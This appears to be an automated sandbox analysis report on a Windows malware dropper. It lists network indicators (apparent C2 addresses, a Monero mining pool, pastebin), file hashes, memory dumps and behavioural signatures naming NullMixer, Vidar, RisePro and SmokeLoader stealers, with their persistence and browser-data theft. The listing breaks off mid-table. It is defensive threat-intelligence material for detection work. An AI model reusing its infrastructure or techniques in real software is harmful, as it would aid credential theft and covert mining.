US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 212.47.253.124:14433 xmr-eu1.nanopool.org tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
N/A 127.0.0.1:49252 tcp
N/A 127.0.0.1:49254 tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp

Files

\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 6c58494fe6c5b1165373ba8a9e2e7599
SHA1 63ec4cf742bddb40a357c33cc4f856cd42ad272c
SHA256 6ad0b50d4c8a38ef40a256a5fa70c77c67227938edbae6a0a796f7caf5533dab
SHA512 0722c387a674bd2afc1a365d9067f34c35ab2f4f8849d8b0dce68eb9dd38d9bcc4dc9402de5e1b61ebab8ed7cbc95a05cd31e2b2b1e62aeb691645ac14a7ba43

C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 913c1f0b3bda02bb59081cabb00100cc
SHA1 e54d696837a705e5375eb01a88b96247f54a18ed
SHA256 30c4283a9d09c12f10df209499658e296ec6ecec00b53eb2856d6fcc02ac1af3
SHA512 b9c6ac42b28f73bb9569512efb9cd9ace8f3cddd45b9a53532a5bf7e589a4ef61e2d854274772f1958c2319e2c25da0ff3bd992b780e2bbc32bbc172e2cff6cb

\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 dbc2a7e79089ccaaff0db5a813ec0573
SHA1 9f59a0dad033190b48656c9e9bc75b4cf92dfaf4
SHA256 fe39d84b3055c59461d7d33cbdd8681c8275078c4af936237c50e2b4dca05905
SHA512 dc32e237a767ed68a77c7c852073b78abbdc4f956343cd3d7685c91eabb20ef9f892697c12c28c7dcceda1ae618ad4345103c2a10eff358f5c5347fcf88272f7

\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 4b834fc3618ec494cf88b8f711be7fa5
SHA1 6529a895aed6dd91a04ec21e10317485fae02add
SHA256 371d57a718c40750fe063117becc1e279b491aafff092ec3b04d00b0507d2d3b
SHA512 9135bdbdc5f123280ae22a35fc71e3fa787f6e68c7ff9241fb426bcdde0a08dc7e7e73702aac16fd2556ab86486ac9494ac9010dd60a8c23dd649e078f1f1832

C:\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 c24c2f6d1f678e9d9c97537a6fa9a21c
SHA1 6e271e38ed67f6a5f040f11c533d94cfe15f1de9
SHA256 0dcbe758665190f8dcbf54c3591b05fdacf5e6d9aeaee0a0d01df5ceb5554ee0
SHA512 70ebf9af85373c8a63f9a6a3f2c65dd3fe4039404d39626667ea6fe7a9bbd10c45f90c20b5a0d48956d53fb6d36ccb23d4d6cc450aa068aa048a0b9dc59fdfb1

memory/2476-33-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2476-44-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2476-43-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2476-47-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2476-49-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2476-52-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1868-129-0x0000000001350000-0x000000000143E000-memory.dmp

memory/3056-131-0x0000000000E30000-0x0000000000F72000-memory.dmp

memory/556-132-0x0000000000D40000-0x0000000000D6C000-memory.dmp

memory/2836-130-0x0000000000930000-0x0000000000938000-memory.dmp

memory/2476-51-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2476-48-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2476-46-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2476-45-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2476-41-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2476-40-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2476-39-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS08971586\setup_install.exe

MD5 58eb70b1e310500fcfcfb92759301f4e
SHA1 fa23fb7eb50c346d04b74fedf26ed1eefede5dfe
SHA256 ac678331b8c80616bb3bc89bdbdf7a82893d0cf367fa19982024f12791790f05
SHA512 566df34bc53f7ff2efdcbb7c905eca94d17237ed30d4357f4227b6162b94aeba6181ef86c36c80da79cc749280b37eeefc8b49cd7a933113dedb973b95da9cd7

memory/2476-37-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS08971586\libstdc++-6.dll

MD5 eb932f619d197305239f51b788d6a739
SHA1 187a2c4f64c44623e12d3305682ec751b31e143c
SHA256 75d5f2decd5de4f274acb9ce8523f725e9a1b576097486accc3f1eec35f6ea9b
SHA512 56d7ab8676449ff0a178f0fb8bdecb0a49f56e75cc050f7cd3efd19841ed175971dc3a9e9dac219377eaa0d82d577e7a1d27efaed79ad349de028a7d06a045bd

C:\Users\Admin\AppData\Local\Temp\7zS08971586\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS08971586\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS08971586\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS08971586\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS08971586\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/556-133-0x0000000000140000-0x0000000000146000-memory.dmp

memory/2836-135-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/556-148-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/3008-150-0x0000000002E60000-0x0000000002F60000-memory.dmp

memory/3008-152-0x0000000003120000-0x00000000031BD000-memory.dmp

memory/556-154-0x0000000000150000-0x0000000000156000-memory.dmp

memory/556-151-0x00000000001E0000-0x0000000000200000-memory.dmp

memory/2612-149-0x0000000000240000-0x0000000000249000-memory.dmp

memory/996-156-0x0000000000940000-0x0000000000A24000-memory.dmp

memory/2612-159-0x0000000000400000-0x0000000002C72000-memory.dmp

memory/1164-146-0x000000013F070000-0x000000013F080000-memory.dmp

memory/3008-173-0x0000000000400000-0x0000000002CCE000-memory.dmp

memory/2612-175-0x0000000002E40000-0x0000000002F40000-memory.dmp

memory/556-174-0x000000001B0E0000-0x000000001B160000-memory.dmp

memory/1164-176-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/2836-177-0x000000001AF90000-0x000000001B010000-memory.dmp

memory/1384-178-0x00000000027E0000-0x00000000027F6000-memory.dmp

memory/2612-179-0x0000000000400000-0x0000000002C72000-memory.dmp

memory/868-184-0x00000000004B0000-0x0000000000594000-memory.dmp

memory/3056-217-0x0000000000640000-0x0000000000652000-memory.dmp

memory/2476-230-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2476-229-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2476-228-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2476-227-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2476-226-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2476-225-0x0000000000400000-0x00000000009DB000-memory.dmp

memory/2836-330-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/556-331-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/3008-339-0x0000000002E60000-0x0000000002F60000-memory.dmp

memory/556-340-0x000000001B0E0000-0x000000001B160000-memory.dmp

memory/2836-385-0x000000001AF90000-0x000000001B010000-memory.dmp

memory/1164-384-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/1164-386-0x000000001C600000-0x000000001C680000-memory.dmp

memory/1164-387-0x00000000007D0000-0x00000000007DE000-memory.dmp

memory/3016-395-0x000000013FE60000-0x000000013FE70000-memory.dmp

memory/1164-399-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/3016-398-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/3056-408-0x00000000072F0000-0x000000000737C000-memory.dmp

memory/3056-427-0x0000000000700000-0x000000000071E000-memory.dmp

memory/556-428-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/2012-431-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2012-429-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2012-448-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS6FA4.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

memory/2360-484-0x0000000073140000-0x00000000736EB000-memory.dmp

memory/2360-485-0x0000000002890000-0x00000000028D0000-memory.dmp

memory/2360-518-0x0000000073140000-0x00000000736EB000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U9VC31Q9\favicon[1].png

MD5 18c023bc439b446f91bf942270882422
SHA1 768d59e3085976dba252232a65a4af562675f782
SHA256 e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482
SHA512 a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

memory/3016-551-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 270d7b576b8e29f0b05f1da28d058ff3
SHA1 0fe7c637d8319e81ab816df31915b38d5382f5a3
SHA256 8d09b57bf723f41c27305a9857244e9c770baeef98e3ce9c938c6fc3bf1be685
SHA512 e533eae0f86fe1b2f1c9720f4b270f1d9736d428c274a3ec5c73f11f03e7926b522fb1ae592ff43717dc39350615f31040f63710c369bffddeccb6e0a198064b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 34c09a4fa127483e2e6f7bba66c3e9d6
SHA1 d1add7839e9c26dd319241ace385ab1a103b072a
SHA256 c0d55c3adb58ace2bd3c88f01142561b1deb62802e6479339caa2281b72986ca
SHA512 f660cdd78ccb10dc45e66b30b3a85eb5add87cdcd610d99c059d9970ed2698df203220e87f308c4bdcbbd962f95f11a9264fe3fbfc86c7ba08b10713adfc303d

memory/3016-1001-0x000000001CA50000-0x000000001CAD0000-memory.dmp

memory/2732-1000-0x000000013FCF0000-0x000000013FCF6000-memory.dmp

memory/2732-1003-0x000000001C0A0000-0x000000001C120000-memory.dmp

memory/2732-1002-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/3016-1017-0x000000001CA50000-0x000000001CAD0000-memory.dmp

memory/2732-1019-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/3016-1037-0x000007FEF5DB0000-0x000007FEF679C000-memory.dmp

memory/2800-1040-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2732-1041-0x000000001C0A0000-0x000000001C120000-memory.dmp

memory/2800-1048-0x00000000003E0000-0x0000000000400000-memory.dmp

memory/2800-1063-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 369040315c1391cc9a0ac9fc54970d65
SHA1 6dccfc21c1005b604dfef999fabc4355e05239ef
SHA256 8d87208c69dfaec03d8b25f5d2e4ff08754b8fb676c9f34d22f5c8aa44042d9a
SHA512 769b6f87b181d8f686f14c89010dad4cd290498b7c07370cc504cbd4d78ac99b210d0a03692d1a4ae34b9dfe9c327a7aa67efa83b4cba3d16f8144e64e44add3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e83012540abcd938de2da7ef1da8d985
SHA1 96fd96c65d686a98ebf082fdbc90fcf4c07f76b2
SHA256 2d452541d2a315488e4dc2b553e9e80363d6778cc07f69d0f75332b268588140
SHA512 9193b60c760909fdba1282639d5eff359385e550d8abafeb7dab70cec518b52927a8a50d92db2964faaec3aa5de7e7d4f9620f072d19350afaa0c52ee5cdd602

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dd223163fa3ebccc5610ea93947ad07e
SHA1 7e577c939ab7d9cbb668a5fe464f1bb5a55c074b
SHA256 f5d6fe3bb10aa29fa69b794541341946c9b8342534b71d11eadf31eb653ddc63
SHA512 0f7ea3559382dae58f87b3d15891b92b6440aa60f326599849e67ad2ce6575223d4fa2546b4e76f7551128684f3b2ef0eb5f73b7a9effd8d47dece0968d396c2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 65a002f257e550bda8895516946ddd3a
SHA1 ebbf9082d730f16ed33a1f0d68d2eaf733534b66
SHA256 42c1da2556b85ed27f0435120bebc40bfe6c36a0e723600022a13323f1881fc1
SHA512 1198c97b18156b52d23f9700ba5849f5a197f184eacf5a533fa4a0c50bf4eb63f7104ac74cc9340ff5168d56c56d2004e6b8af527f71b0ad4ce3fd9436a0533c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 14270fa89e6407dc80b57dac503ad67d
SHA1 eebd61b2d36ff8770279836e85682c7d207114fb
SHA256 4cc22f0f210613c9ef22718b348845852a972440f9bbd30ca133fc542c0b49a5
SHA512 9025700b2712d8e6e657432f4794433f1f6763e322e70460566a2a370c4ac67835e0f7465c2e549bc59a73171b3d8e42bb41e90d428a58e3555433cfa7059501

memory/2800-1395-0x00000000003E0000-0x0000000000400000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-07 10:02

Reported

2024-01-07 10:06

Platform

win10v2004-20231215-en

Max time kernel

85s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe"

Signatures

NullMixer

dropper nullmixer

PrivateLoader

loader privateloader

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\81edfb0db828.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\27e380c23ad33.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4452 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe
PID 4452 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe
PID 4452 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe
PID 2024 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe C:\Windows\SysWOW64\cmd.exe
